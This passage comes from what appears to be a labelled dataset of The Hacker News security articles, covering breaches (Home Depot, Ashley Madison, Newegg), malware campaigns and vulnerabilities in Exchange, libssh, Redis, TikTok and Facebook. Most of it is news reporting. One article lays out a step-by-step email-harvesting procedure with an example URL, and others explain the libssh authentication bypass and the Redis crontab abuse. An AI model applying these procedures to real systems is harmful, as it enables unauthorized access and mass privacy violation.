network SNMP community strings?"" The victims are spread across various countries Russia, Iran, Brazil, India, Ukraine, Bangladesh, Indonesia, Ecuador, the United States, Argentina, Colombia, Poland, Kenya, Iraq, and some European and Asian countries, with Russia being the most affected. Netlab did not share the IP addresses of the victims to the public for security reasons but said that relevant security entities in affected countries can contact the company for a full list of infected IP addresses. The best way to protect yourself is to PATCH. MikroTik RouterOS users are highly recommended to update their devices and also check if the HTTP proxy, Socks4 proxy, and network traffic capture function are being maliciously exploited. ",Cyber_Attack CISA Issues Emergency Directive on In-the-Wild Microsoft Exchange Flaws,https://thehackernews.com/2021/03/cisa-issues-emergency-directive-on-in.html,"Following Microsoft's release of out-of-band patches to address multiple zero-day flaws in on-premises versions of Microsoft Exchange Server, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive warning of ""active exploitation"" of the vulnerabilities. The alert comes on the heels of Microsoft's disclosure that China-based hackers were exploiting unknown software bugs in Exchange server to steal sensitive data from select targets, marking the second time in four months that the U.S. has scrambled to address a widespread hacking campaign believed to be the work of foreign threat actors. While the company mainly attributed the campaign to a threat group called HAFNIUM, Slovakian cybersecurity firm ESET said it found evidence of CVE-2021-26855 being actively exploited in the wild by several cyber espionage groups, including LuckyMouse, Tick, and Calypso targeting servers located in the U.S., Europe, Asia, and the Middle East. Researchers at Huntress Labs have also sounded the alarm about mass exploitation of Exchange servers, noting that over 350 web shells have been discovered across approximately 2,000 vulnerable servers. ""Among the vulnerable servers, we also found over 350 web shells — some targets may have more than one web shell, potentially indicating automated deployment or multiple uncoordinated actors,"" Huntress senior security researcher John Hammond said. ""These endpoints do have antivirus or EDR solutions installed, but this has seemingly slipped past a majority of preventative security products."" The latest development indicates a much larger spread that extends beyond the ""limited and targeted"" attacks reported by Microsoft earlier this week. It's not clear if any U.S. government agencies have been breached in the campaign, but the CISA directive underscores the urgency of the threat. Strongly urging organizations to apply the patches as soon as possible, the agency cited the ""likelihood of widespread exploitation of the vulnerabilities after public disclosure and the risk that federal government services to the American public could be degraded."" ",Vulnerability Beware! You Can Get Hacked Just by Opening a 'JPEG 2000' Image,https://thehackernews.com/2016/10/openjpeg-exploit-hack.html,"Researchers have disclosed a critical zero-day vulnerability in the JPEG 2000 image file format parser implemented in OpenJPEG library, which could allow an attacker to remotely execute arbitrary code on the affected systems. Discovered by security researchers at Cisco Talos group, the zero-day flaw, assigned as TALOS-2016-0193/CVE-2016-8332, could allow an out-of-bound heap write to occur that triggers the heap corruption and leads to arbitrary code execution. OpenJPEG is an open-source JPEG 2000 codec. Written in C language, the software was developed for coding and encoding JPEG2000 images, a format that is often used for tasks like embedding image files within PDF documents through popular software including PdFium, Poppler, and MuPDF. Hackers can exploit the security vulnerability by tricking the victim into opening a specially crafted, malicious JPEG2000 image or a PDF document containing that malicious file in an email. The hacker could even upload the malicious JPEG2000 image file to a file hosting service, like Dropbox or Google Drive, and then send that link to the victim. Once downloaded to the system, it would create a way for hackers to remotely execute malicious code on the affected system. The flaw was caused ""due to an error while parsing mcc records in the jpeg2000 file,...resulting in an erroneous read and write of adjacent heap area memory,"" Cisco explained in its advisory. ""Careful manipulation of heap layout and can lead to further heap metadata process memory corruption ultimately leading to code execution under attacker control."" The researchers successfully tested the JPEG 2000 image exploit on the OpenJPEG openjp2 version 2.1.1. The flaw was discovered by Aleksandar Nikolic from the Cisco Talos Security team. The team reported the zero-day flaw to OpenJPEG developers in late July, and the company patched the flaw last week with the release of version 2.1.2. The vulnerability has been assigned a CVSS score of 7.5, categorizing it as a high-severity bug. ",Vulnerability Hackers Steal Customers' Credit Cards From Newegg Electronics Retailer,https://thehackernews.com/2018/09/newegg-credit-card-hack.html,"The notorious hacking group behind the Ticketmaster and British Airways data breaches has now victimized popular computer hardware and consumer electronics retailer Newegg. Magecart hacking group managed to infiltrate the Newegg website and steal the credit card details of all customers who entered their payment card information between August 14 and September 18, 2018, according to a joint analysis from Volexity and RiskIQ. Magecart hackers used what researchers called a digital credit card skimmer wherein they inserted a few lines of malicious Javascript code into the checkout page of Newegg website that captured payment information of customers making purchasing on the site and then send it to a remote server. Active since at least 2015, the Magecart hacking group registered a domain called neweggstats(dot)com on August 13, similar to Newegg's legitimate domain newegg.com, and acquired an SSL certificate issued for the domain by Comodo for their website. A day later, the group inserted the skimmer code into the Newegg website at the payment processing page, so that it would not come into play until or unless the payment page was hit. So, when customers add a product in their shopping cart, enter their delivery information during the first step of the check-out, and validate their address, the website takes them to the payment processing page to enter their credit card information. As soon as the customer hit submit button after entering their credit card information, the skimmer code immediately sends a copy that data to the attacker's domain, i.e., neweggstats(dot)com without interrupting the checkout process. Newegg Hack May Affect Millions of Customers The attack affected both desktop and mobile customers, though it is still unclear how many customers were actually hit by this credit card breach. However, considering that more than 50 million shoppers visit Newegg every month and that the malicious code was there for over one month, it could be assumed that this Magecart newest card skimming campaign has possibly stolen the payment information on millions of Newegg customers, even if only a fraction of those visitors make purchases. Earlier this month, the Magecart hacking group breached the British Airways website and its mobile application and managed to walk away with a bounty of sensitive payment card data from 380,000 victims. ""The skimmer code [used in the Newegg breach] is recognizable from the British Airways incident, with the same basecode,"" RiskIQ researchers said. ""All the attackers changed is the name of the form it needs to serialize to obtain payment information and the server to send it to, this time themed with Newegg instead of British Airways."" In the Newegg case, the hackers used smaller skimmer code of ""a tidy 15 lines of script,"" since it only had to serialize one form. If you are one of those Newegg customers who entered their credit card details on the website during the attack period, you should immediately contact your bank, block your payment card, and request for a replacement. However, the way Magecart is scooping up payment card data from popular services with relatively little efforts suggests that Newegg probably will not be its last target. ",Cyber_Attack New Critical Exim Flaw Exposes Email Servers to Remote Attacks — Patch Released,https://thehackernews.com/2019/09/exim-email-security-vulnerability.html,"A critical security vulnerability has been discovered and fixed in the popular open-source Exim email server software, which could allow a remote attacker to simply crash or potentially execute malicious code on targeted servers. Exim maintainers today released an urgent security update—Exim version 4.92.3—after publishing an early warning two days ago, giving system administrators an early head-up on its upcoming security patches that affect all versions of the email server software from 4.92 up to and including then-latest version 4.92.2. Exim is a widely used, open source mail transfer agent (MTA) developed for Unix-like operating systems like Linux, Mac OSX or Solaris, which runs almost 60 percent of the Internet's email servers today for routing, delivering and receiving email messages. This is the second time in this month when the Exim maintainers have released an urgent security update. Earlier this month, the team patched a critical remote code execution flaw (CVE-2019-15846) in the software that could have allowed remote attackers to gain root-level access to the system. Identified as CVE-2019-16928 and discovered by Jeremy Harris of Exim Development Team, the vulnerability is a heap-based buffer overflow (memory corruption) issue in string_vformat defined in string.c file of the EHLO Command Handler component. The security flaw could allow remote attackers to cause a denial of service (DoS) condition or execute arbitrary code on a targeted Exim mail server using a specially crafted line in the EHLO command with the rights of the targeted user. According to the Exim advisory, a currently known PoC exploit for this vulnerability allows one to only crash the Exim process by sending a long string in the EHLO command, though other commands could also be used to potentially execute arbitrary code. ""The currently known exploit uses an extraordinary long EHLO string to crash the Exim process that is receiving the message,"" says the Exim developers' team. ""While at this mode of operation, Exim already dropped its privileges, other paths to reach the vulnerable code may exist."" In mid-year, Exim also patched a severe remote command execution vulnerability (CVE-2019-10149) in its email software that was actively exploited in the wild by various groups of hackers to compromise vulnerable servers. Therefore, server administrators are highly recommended to install the latest Exim 4.92.3 version as soon as possible, since there is no known mitigation to temporarily resolve this issue. The team also says, ""if you can't install the above versions, ask your package maintainer for a version containing the backported fix. On request and depending on our resources, we will support you in backporting the fix."" The security update is available for Linux distributions, including Ubuntu, Arch Linux, FreeBSD, Debian, and Fedora. ",Vulnerability 'The Home Depot' Data Breach Put 56 Million Payment Cards at Risk,https://thehackernews.com/2014/09/the-home-depot-data-breach-put-56_18.html,"Home Depot, the nation's largest home improvement retailer, announced on Thursday that a total of 56 million unique payment cards were likely compromised in a data breach at its stores, suggesting that the data breach on Home improvement chain was larger than the Target data breach that occurred last year during Christmas holidays. The data theft occurred between April and September at Home Depot stores in both the United States and Canada, but the confirmation comes less than a week after the retailer first disclosed the possibility of a breach. ""We apologize to our customers for the inconvenience and anxiety this has caused, and want to reassure them that they will not be liable for fraudulent charges,"" Home Depot CEO Frank Blake said in a statement. ""From the time this investigation began, our guiding principle has been to put our customers first, and we will continue to do so."" It is believe that the cybercriminals successfully compromised the Home Depot's network and installed a unique, custom-built software on the company's point-of-sale (PoS) systems in order to steal information on its customers' debit and credit cards and siphoned off to cyber crooks, the company stated. The nasty malware used to infect the company's system had not been seen in any of the previous cyber attacks. The malware was designed to evade detection in its most complete account. In upcoming days, the payment cards details are believed to be sold in underground black market, resulting in identity theft to millions of customers. But to help its customers, Home Depot also said that it is offering free identity protection services to those customers who may have been affected by the data breach. According to the Home improvement retailer, so far the costs of the data breach is estimated to be $62 million, but it could reach much higher because the full scope, scale and impact of the breach has yet to be determined, so it may take months in calculating the actual loss. ""To protect customer data until the malware was eliminated, any terminals identified with malware were taken of out service, and the company quickly put in place other security enhancements,"" Home Depot said in its statement. ""The hacker's method of entry has been closed off, the malware has been eliminated from the company's systems, and the company has rolled out enhanced encryption of payment data to all U.S. stores."" The company assured its customers that no PINs were obtained in the data breach and it found no evidence of fraud on the compromised accounts yet. Also there is no evidence that anyone who shopped at stores in Mexico or shopped online at the retailer's website were affected. As a part of its efforts, the DIY giant has completed a ""major payment security project"" in order to provide enhanced encryption at the point of sale in the company's U.S. stores. This project will be completed in Canadian outlets by early 2015, offering significant new protection for customers. The exposure of the data breach put Home Depot in the list of firms that have been compromised by point-of-sale malware, in which the U.S. retailer Target topped the list. However in coming weeks, Home Depot breach may give a tough competition to Target breach, which resulted in the loss of 40 million cards and the personal information of 70 million individuals, lasted three weeks during the 2013 holiday shopping season. ",Data_Breaches Oops! Adult Dating Website Ashley Madison Hacked; 37 Million Accounts Affected,https://thehackernews.com/2015/07/adult-dating-website.html,"""Life is short. Have an affair,"" but always remember ""Cheaters never prosper."" AshleyMadison.com, an American most prominent dating website, that helps married people cheat on their spouses has been hacked, potentially putting very private details of Millions of its users at risk of being exposed. The Stolen personal data may include information from users' real names, addresses and their personal photographs to credit card details and sexually explicit chat logs. With a Huge Database of over 37 Million users, AshleyMadison.com, owned by Avid Life Media (ALM) company, is a very popular dating website that helps married people have extramarital affairs. Cougar Life and Established Men, two other dating sites also owned by Avid Life Media, have also had their data compromised. The Hacker group responsible for the hacks called itself ""The Impact Team,"" a company spokesperson confirmed. The group apparently raises an objection to the website's morally dubious business model and were threatening the company to release all its customer records if the Ashley Madison and Established Men are not completely shut down. The Impact Team claims to have complete access to not only personal account information of the company's customers, but also their secret sexual fantasies and matching credit card transactions, names, residential addresses, employee documents and emails. Reason behind the Ashley Madison Hack The Impact Team of hackers appears to be upset over a website's service called ""Full Delete"" that promises to erase a customer's profile and all associated data for a $19 fee completely. However, according to the Impact Team, Ashley Madison made money from the paid ""Full Delete"" service that does not work. ""Full Delete netted [Avid Life Media] $1.7mm in revenue in 2014. It's also a complete lie,"" the group wrote in a statement released Sunday. ""Users almost always pay with the credit card; their purchase details are not removed as promised and include real name and address, which is, of course, the most important information the users want to be removed."" The company denied the claims, however, is now temporarily offering its customers the ability to delete their account completely from the website free of charge. If you are Ashley Madison customer, You should Worry Avid Life Media is working with law enforcement agencies to investigate this criminal act and also using Digital Millennium Copyright Act to get the personal data the hackers have disclosed so far removed from the Internet. However, It's unlikely to be a prevention measure, because once the personal data has been publicly exposed over the Internet, it becomes almost next to impossible to stop its spread. Also Read: Lessons We Learned From Ashley Madison Data Breach ",Data_Breaches 75% of the 'Left to Get Hacked' Redis Servers Found Infected,https://thehackernews.com/2018/06/redis-server-hacking.html,"Despite the continual emergence of new cyber attacks because of misconfigured servers and applications, people continue to ignore security warnings. A massive malware campaign designed to target open Redis servers, about which researchers warned almost two months ago, has now grown and already hijacked at least 75% of the total servers running publicly accessible Redis instances. Redis, or REmote DIctionary Server, is an open source, widely popular data structure tool that can be used as an in-memory distributed database, message broker or cache. Since it is designed to be accessed inside trusted environments, it should not be exposed on the Internet. Dubbed RedisWannaMine, a similar malware leveraging same loophole was discovered in late March by data center security vendor Imperva and designed to drop a cryptocurrency mining script on the targeted servers—both database and application. According to Imperva's March blog post, this cryptojacking threat was ""more complex in terms of evasion techniques and capabilities. It demonstrates a worm-like behavior combined with advanced exploits to increase the attackers' infection rate and fatten their wallets."" A newly published report from the same security firm has now revealed that three-quarters of the open Redis servers accessible from the Internet (over port 6379) contain malicious sets of a key-value pair in the memory, indicating despite multiple warnings administrators continue to leave their servers vulnerable to hackers. Out of total compromised servers, 68 percent systems were found infected using similar keys, named ""backup1, backup2, backup3,"" which were attacked from a medium-sized botnet located at China (86% of IPs), according to the data Imperva collected from their self-set-up publicly available Redis servers to serve as a honeypot. Moreover, the attackers have now found using the compromised servers as a proxy to scan and find vulnerabilities, including SQL injection, cross-site scripting, malicious file uploads, and remote code executions, in other websites. The new attack works by setting a malicious key-value pair in the memory and saving it as a file in the /etc/crontabs folder that forces the server to execute the file. ""Attackers usually set values that include commands to download external remote resource and run it. Another popular type of command is adding SSH keys, so the attacker can remotely access the machine and take it over,"" Nadav Avital, security research team leader at Imperva, explains in a blog post. To protect Redis servers from falling victim to such attacks, administrators are advised never to expose their servers to the Internet, but if required, apply authentication mechanism to prevent unauthorized access. Also, since Redis doesn't use encryption and stores data in plain text, you should never store any sensitive data on these servers. ""Security issues commonly arise when people don't read the documentation and migrate services to the cloud, without being aware of the consequences or the adequate measures that are needed to do so,"" Avital said. ",Malware 70% of South Korean Population Victimized In Online Gaming Heist,https://thehackernews.com/2014/08/70-of-south-korean-population_27.html,"More than half of South Korea's 50 million population aged between 15 and 65 have been affected in a massive data breach, compromising their personal information. The data breach came to light when 16 individual were arrested following the theft of about 220 million stolen records from a number of online game, ringtone storefronts and movie ticket sites that contains personally identifiable information related to 27 million victims. The stolen records included actual name, account name, password and resident registration number of the victims, According to the English version of a Seoul-based daily newspaper, the Korea Joongang Daily. Among 16 perpetrators, the South Jeolla Provincial Police Agency arrested a 24-year-old man named 'Kim' , for allegedly obtaining and selling all 220 million personal information including names, registration numbers, account names, and passwords, from a Chinese hacker he met through an online game in 2011. Police estimated the breach caused in secondary damages alone is nearly $2 million. Also, Kim hacked into a total of 6 online video games in South Korea using the stolen information, from which he allegedly stole almost $400,000. Kim reportedly gave $130,000 cut of the money to the Chinese hacker whom he initially acquired the information from. The stolen information was sold for prices ranging from US$0.001 to US$20 per item depending on whether the buyer is a thief or illegal gaming advertiser, the police said. Authorities claim Kim went on to sell the personal information to mortgage fraudsters and ""illegal gambling advertisers"" for for 10 to 300 won, or a fraction of a U.S. dollar. Those swindlers and advertisers duped hundreds of South Koreans between September 2012 and November 2013. Online gaming is wildly popular in South Korea, so the stolen information is of much use for the buyers. They used those credentials to steal in-game currency and other game-related items from online gaming accounts and sold off to other players at a much higher rates. It is estimated that the hackers have used a hack tool dubbed ""extractor"" that would log into user accounts and steal the information. Although, the authorities are investigating how the stolen information has been circulating and is in the middle of pursuing seven other suspects, including the Chinese hacker. The breach was really bad, but it isn't the first time that Internet users in South Korea are suffering from a massive data breach. The more damaging data breach occurred in 2011, in which 35 million people of the country were exposed after hackers broke into the database South Cyworld, a South Korean social media site and the search engine Nate portal. Earlier this year, 20 million South Koreans were impacted by a data breach caused by an employee of the Korea Credit Bureau, who copied their PII onto an external drive over a period of 18 months. ",Data_Breaches Latest Security Flaw in Skype Enables IP address & Location Tracking,https://thehackernews.com/2011/10/latest-security-flaw-in-skype-enables.html,"Latest Security Flaw in Skype Enables IP address & Location Tracking The serious breach in the widely-used, internet video chat program means that any evil computer nerd could easily hunt down users' whereabouts, according to a study co-authored by an NYU-Poly professor. The flaw in Skype could allow a skilled hacker to find out the IP address from which a user has logged in to Skype, thereby determining the location of Skype users, which is a massive breach of privacy and security. The company is trying to downplay the flaw, claiming that the ability to derive IP addresses was common with all web based communication clients. The flaw can reportedly be exploited without the user's knowledge, and can be executed on a massive scale. The reserch team demonstrated this by scheduling hourly calls to tens of thousands of Skype users. Adrian Asher, Skype's chief information security officer, said that IP addresses are easily uncovered in most web communications clients.""Just as with typical Internet communications software, Skype users who are connected may be able to determine each other's IP addresses. Through research and development, we will continue to make advances in this area and improvements to our software,"" he told. ",Vulnerability TikTok Bug Could Have Exposed Users' Profile Data and Phone Numbers,https://thehackernews.com/2021/01/tiktok-bug-could-have-exposed-users.html,"Cybersecurity researchers on Tuesday disclosed a now-patched security flaw in TikTok that could have potentially enabled an attacker to build a database of the app's users and their associated phone numbers for future malicious activity. Although this flaw only impacts those users who have linked a phone number with their account or logged in with a phone number, a successful exploitation of the vulnerability could have resulted in data leakage and privacy violation, Check Point Research said in an analysis shared with The Hacker News. TikTok has deployed a fix to address the shortcoming following responsible disclosure from Check Point researchers. The newly discovered bug resides in TikTok's ""Find friends"" feature that allows users to sync their contacts with the service to identify potential people to follow. The contacts are uploaded to TikTok via an HTTP request in the form of a list that consists of hashed contact names and the corresponding phone numbers. The app, in the next step, sends out a second HTTP request that retrieves the TikTok profiles connected to the phone numbers sent in the previous request. This response includes profile names, phone numbers, photos, and other profile related information. While the upload and sync contact requests are limited to 500 contacts per day, per user, and per device, Check Point researchers found a way to get around the limitation by getting hold of the device identifier, session cookies set by the server, a unique token called ""X-Tt-Token"" that's set when logging into the account with SMS and simulate the whole process from an emulator running Android 6.0.1. It's worth noting that in order to request data from the TikTok application server, the HTTP requests must include X-Gorgon and X-Khronos headers for server verification, which ensures that the messages are not tampered with. But by modifying the HTTP requests — the number of contacts the attacker wants to sync — and re-signing them with an updated message signature, the flaw made it possible to automate the procedure of uploading and syncing contacts on a large scale and create a database of linked accounts and their connected phone numbers. This is far from the first time the popular video-sharing app has been found to contain security weaknesses. In January 2020, Check Point researchers discovered multiple vulnerabilities within the TikTok app that could have been exploited to get hold of user accounts and manipulate their content, including deleting videos, uploading unauthorized videos, making private ""hidden"" videos public, and revealing personal information saved on the account. Then in April, security researchers Talal Haj Bakry and Tommy Mysk exposed flaws in TikTok that made it possible for attackers to display forged videos, including those from verified accounts, by redirecting the app to a fake server hosting a collection of fake videos. Eventually, TikTok launched a bug bounty partnership with HackerOne last October to help users or security professionals flag technical concerns with the platform. Critical vulnerabilities (CVSS score 9 - 10) are eligible for payouts between $6,900 to $14,800, according to the program. ""Our primary motivation, this time around, was to explore the privacy of TikTok,"" said Oded Vanunu, head of products vulnerabilities research at Check Point. ""We were curious if the TikTok platform could be used to gain private user data. It turns out that the answer was yes, as we were able to bypass multiple protection mechanisms of TikTok that lead to privacy violation."" ""An attacker with that degree of sensitive information could perform a range of malicious activities, such as spear phishing or other criminal actions."" ",Vulnerability Android.Bmaster Exploits root access to connect to Botnet,https://thehackernews.com/2012/02/androidbmaster-exploits-root-access-to.html,"Android.Bmaster Exploits root access to connect to Botnet A new piece of Android malware named Android.Bmaster, first highlighted by researcher Xuxian Jiang at North Carolina State University, was uncovered on a third-party marketplace and is bundled with a legitimate application for configuring phone settings, Symantec researcher Cathal Mullaney wrote in a blog. This Malware is estimated to affect between 10,000 and 30,000 phones on any given day. The malware, mostly found on Chinese phones, works by using GingerBreak, a tool that gives users root access to Android 2.3 Gingerbread. RootSmart is designed to escape detection by being named ""com.google.android.smart,"" which the same name as a settings app included by default with Android operating systems. Mullaney explained that once the malware is installed on the Android phone, an outbound connection from the infected phone to a remote server is generated.""The malware posts some user and phone-specific data to the remote address and attempts to download and run an APK file from the server. The downloaded file is the second stage in the malware and is a Remote Administration Tool (RAT) for Android, detected as Android.Bmaster. This type of malware is used to remotely control a device by issuing commands from a remote server"". To counter the rising tide of threats, Google last week announced it had launched an app prescreening tool called Bouncer that runs a server-based simulation to check apps for malicious behavior such as attempts to access or send personal data, or simply send out pricey text messages. Google blocks them before they get into the official Android Market.Bouncer has been used quietly for several months; in the second half of 2011, the Android market saw a 40 percent decrease in malware apps identified as potentially malicious, compared to the first half of the year. Google spokesperson Nancarrow points out that Rootsmart wasn't found in the official Android Market and so falls outside the zone of protection that Google is trying to enforce with its new malware scanner. And the fact that Gingerbreak was already patched, he adds, points to Android's ""defense in depth approach, not a reliance on any specific user protection measure."" Get one Best Security Product for your Android from above list, If you really love your Phone, Read Here. ",Vulnerability Vulnerability in Facebook discloses Primary Email Address of any account,https://thehackernews.com/2013/07/vulnerability-in-facebook-discloses.html,"When you sign up on Facebook, you have to enter an email address and that email address becomes your primary email address on Facebook. In a recent disclosure by a Security researcher, Stephen Sclafani - The Social Networking site Facebook was vulnerable to disclosure of primary email address of any Facebook user to hackers and spammers. The flaw resides in the invitation mechanism of Facebook, using which one can invite his all contacts emails to Facebook for making new account. As shown in following screenshot, an invitation received on an email, where one need to click the Signup URL: After clicking that URL, invited user will be redirected to a signup page filled in with the email address and the name of a person who used the link to sign up for an account was displayed: There are two parameters in this URL, i.e ""re"" and ""mid"". According to Stephen changing some part of ""mid"" parameter can expose the email address of another user. https://www.facebook.com/r.php?re=245bf2da75118af20d917bdd34babddb&mid=59b63aG5af3107aba69G0G46 59b63a G 5af3107aba69 G 0 G 46 He explained that, in above string, ""G"" acting as a delimiter/separator, where 2nd value after first ""G"" i.e 5af3107aba69 is the Profile ID of user. Replacing user ID can give expose email ID of any user in Sign Up Page. Attacker can obtain this numerical ID of facebook profile from Graph API. Using this flaw attacker can extract email address of all facebook profiles for spamming or hacking purpose. Attacker need to just write an automated script/code to grab all email address of billions of facebook users. Using following steps hacker can write a automated code to grab all emails: 1.) Grab profile links of all facebook users from Facebook People Directory i.e https://www.facebook.com/directory/people/ 2.) Collect Numerical Facebook ID for each Profile from facebook Graph API i.e https://graph.facebook.com/mohitkumar.thehackernews, where extracted user ID is 1251386282. 3.) In Next step, using curl or other methods open the modified URL for each profile ie https://www.facebook.com/r.php?re=245bf2da75118af20d917bdd34babddb&mid=59b63aG1251386282G0G46 4.) Filter the email address exposed in the Source code obtained from above step for each profile and store in database. This way, above vulnerability was able to put every facebook user at Risk, but Stephen's responsible disclosure to Facebook Security team save us. He is rewarded with $3,500 for helping them to patch this flaw. ",Vulnerability Warning: Millions Of P0rnHub Users Hit With Malvertising Attack,https://thehackernews.com/2017/10/online-malvertising-attack.html,"Researchers from cybersecurity firm Proofpoint have recently discovered a large-scale malvertising campaign that exposed millions of Internet users in the United States, Canada, the UK, and Australia to malware infections. Active for more than a year and still ongoing, the malware campaign is being conducted by a hacking group called KovCoreG, which is well known for distributing Kovter ad fraud malware that was used in 2015 malicious ad campaigns, and most recently earlier in 2017. The KovCoreG hacking group initially took advantage of P0rnHub—one of the world's most visited adult websites—to distribute fake browser updates that worked on all three major Windows web browsers, including Chrome, Firefox, and Microsoft Edge/Internet Explorer. According to the Proofpoint researchers, the infections in this campaign first appeared on P0rnHub web pages via a legitimate advertising network called Traffic Junky, which tricked users into installing the Kovtar malware onto their systems. Among other malicious things, the Kovter malware is known for its unique persistence mechanism, allowing the malware to load itself after every reboot of the infected host. The Traffic Junky advertising network redirected users to a malicious website, where Chrome and Firefox users were shown a fake browser update window, while Internet Explorer and Edge users got a fake Flash update. ""The [infection] chain begins with a malicious redirect hosted on avertizingms[.]com, which inserts a call hosted behind KeyCDN, a major content delivery network,"" Proofpoint writes. The attackers used a number of filters and fingerprinting of ""the timezone, screen dimension, language (user/browser) history length of the current browser windows, and unique id creation via Mumour,"" in an effort to target users and evade analysis. Researchers said Chrome users were infected with a JavaScript which beaconed back to the server controlled by the attackers, preventing security analysts working through the infection chain if their IP had not ""checked in."" ""This makes it extremely unlikely that the JavaScript can be run alone and provide the payload in a sandbox environment,"" Proofpoint writes. ""This is most likely why this component of the chain has not been documented previously."" In this case, the attackers limited their campaign to click fraud to generate illicit revenue, but Proofpoint researchers believed the malware could easily be modified to spread ransomware, information stealing Trojans or any other malware. Both P0rnHub and Traffic Junky, according to the researchers, ""acted swiftly to remediate this threat upon notification."" Although this particular infection chain was successfully shut down after the site operator and ad network got notified, the malware campaign is still ongoing elsewhere. ",Malware Mobile Security and Lack thereof,https://thehackernews.com/2011/11/mobile-security-and-lack-thereof.html,"Mobile Security and Lack thereof Nidhi Rastogi ,A Security Consultant with Logic Technology Inc, New York share her Views about the Mobile Security and Lack thereof . The Article is taken from our September Month Magazine Edition .Here we go.. Mobile technology, particularly smartphones, has come of age and is increasingly replacing PCs for internet surfing, emails, gaming and social networking. As per a recent survey by Neilson Media Research, smartphones now comprise over 38% of the U.S. Cellphone Market and will become the majority by end of the year. To meet this growing demand, cellphone companies are fast churning out new models with killer features, latest and greatest in technology. With this growth it has also come to attention that security of these devices cannot be left behind. Every day a new data breach is making headlines suggesting hackers have gone into overdrive. However, what is of particular interest is that a bulk of them is being attributed to cellphones. Hacking alone accounted for $3.2 billion in losses for the telecom industry, says CFCA. The culprits are many. Several companies like Apple and Google own online application store that allow 3rd party developers to upload programs that can be made available for download by the users. Many users are deceived into downloading applications that appear to be legitimate. The terms are conditions are loosely defined which makes them easy to accept. Once on the device, the ""app"" can do a variety of damage, and at times without alarming the user. The App Genome Project by the company Lookout showed that in a study of 100,000 apps for iPhones and Android devices, a substantial proportion contained code which could pose a security risk. In another recent finding, security researchers at Trend Micro discovered a malware on Android devices that disguised itself as a Google+ app. The app was capable of performing malicious activities like recording phone calls and gathering GPS location, and more. This user data was then uploaded on a remote server. The application called itself Google++, which apparently was overlooked by several customers. It's worth mentioning here that a big factor in the working of a malware is the casual behavior of the user, who fails to pay enough attention when installing a program on their device. In another report, SMS Android Trojan was hidden inside a movie player app and, once installed, would send out premium text messages. Many such malwares and viruses combined have affected up to 250,000 android devices to date. The rationale behind making smartphone the target by hackers is very simple. A smart phone today not only stores contacts but also other sensitive information like emails, pictures, and more. And in the case of some devices, a history of user visited locations with timelines. The faster and improved cellular networks and Wi-Fi capability have made handheld computing very convenient, making it a widely accepted product. Hence, it has attracted the attention of hackers with malicious intent. This increased visibility has, however, put pressure on software companies as well as hardware manufacturers to provide security features and configuration options. Facebook now offers its users secure logging via SSL on their wireless devices by activating an account setting. Twitter followed suit by enabling ""always-on SSL"" and thereby keeping user data secure even when connected through a public Wi-Fi. The users too need to be vigilant of their devices. In case of a lost device, remote erasure of data or locking of the device is recommended. An alternative is to trigger the remote kill switch which will render the phone dead. If the device contains sensitive information, it is recommended to store digital assets in encrypted folders. Other simple tricks include keeping the Bluetooth off and in non-promiscuous mode at all times, unless when in-use. Contacts, photos and videos should be periodically backed-up in a safe location, preferably encrypted. Several anti-virus software compatible with various OS platforms are available for download from online application markets to help make sure that mobile devices are as secure as possible. Some Real world Mobile Security Issues in Recent News: Cross Application Scripting vulnerability in Android browser Fake 'Walk and Text' App steals Android user data iPhone can be used as spy phone to get desktop Keystrokes iPhone Skype XSS Vulnerability Lets Hackers Steal Phonebook [Video] Android phones vulnerable to hackers HTC Android Vulnerability - Exposes Phone numbers, Gps, SMS, Emails etc Android malware - Works on remote commands form encrypted blog QR codes - Next way for Android Malware More Android vulnerabilities exposed [Video Demonstration] SpyEye Trojan stole $3.2 million from US victims,Android users will be next target ! ",Malware Bredo Banking Malware Campaign Targets Bank of America Customers,https://thehackernews.com/2014/02/bredo-banking-malware-campaign-targets.html,"The Major US Financial institution, Bank of America is being targeted by a stealthy malicious financial malware campaign, according to AppRiver report. Last month the researchers at AppRiver has noticed enormous volumes of traffic through their data centers, with the peaks of traffic reaching three or four times than their normal network traffic. They caught and blocked a malware campaign that was using the new and novel tactics designed specifically to beat the filtering engines. Last Wednesday the company experienced huge spam traffic i.e. 10 to 12 times the normal amount of their normal routine traffic. ""These spikes have been driven by a tremendous increase in the number of incoming messages being sent with viruses attached."" and some user experienced delays in sending and receiving mail. They found the malware campaign, distributing a Financial Trojan designed to target, the Bank of America customers, known as 'Bredo virus', capable of stealing information such as Credit Card Numbers, Banking credentials, user's keystrokes. AppRiver said that 'The software may also have abilities to further infect a system by downloading more malware on to the machine' and added that, 'running through a variety of virus scanners showed that only 11 of 51 antivirus vendors were classifying it as malware.' The Bredo botnet was first detected in May 2009 and is capable of propagating through malicious e-mails that includes malware attachments which would infect a computer when opened, effectively turning the computer into another zombie controlled by the botnet. In October 2010, the Dutch law enforcement agents seized 143 LeaseWeb servers used as command & the control center of botnet, but were not able to successfully vanish it completely. ",Malware LibSSH Flaw Allows Hackers to Take Over Servers Without Password,https://thehackernews.com/2018/10/libssh-ssh-protocol-library.html,"A four-year-old severe vulnerability has been discovered in the Secure Shell (SSH) implementation library known as Libssh that could allow anyone to completely bypass authentication and gain unfettered administrative control over a vulnerable server without requiring a password. The security vulnerability, tracked as CVE-2018-10933, is an authentication-bypass issue that was introduced in Libssh version 0.6 released earlier 2014, leaving thousands of enterprise servers open to hackers for the last four years. But before you get frightened, you should know that neither the widely used OpenSSH nor Github's implementation of libssh was affected by the vulnerability. The vulnerability resides due to a coding error in Libssh and is ""ridiculously simple"" to exploit. According to a security advisory published Tuesday, all an attacker needs to do is sending an ""SSH2_MSG_USERAUTH_SUCCESS"" message to a server with an SSH connection enabled when it expects an ""SSH2_MSG_USERAUTH_REQUEST"" message. Due to a logical flaw in libssh, the library fails to validate if the incoming ""successful login"" packet was sent by the server or the client, and also fails to check if the authentication process has been completed or not. Therefore, if a remote attacker (client) sends this ""SSH2_MSG_USERAUTH_SUCCESS"" response to libssh, it considers that the authentication has been successful and will grant the attacker access to the server, without needing to enter a password. Although GitHub uses libssh, it confirms that its official website and GitHub Enterprise are not affected by the vulnerability due to how GitHub uses the library. ""We use a custom version of libssh; SSH2_MSG_USERAUTH_SUCCESS with the libssh server is not relied upon for pubkey-based auth, which is what we use the library for,"" a GitHub security official said on Twitter. ""Patches have been applied out of an abundance of caution, but GHE [GitHub Enterprise] was never vulnerable to CVE-2018-10933."" Shodan search shows that around 6,500 internet-facing servers may be impacted due to the use of Libssh one or the other way. The security bug was discovered by Peter Winter-Smith from NCC Group, who responsibly disclosed the issue to 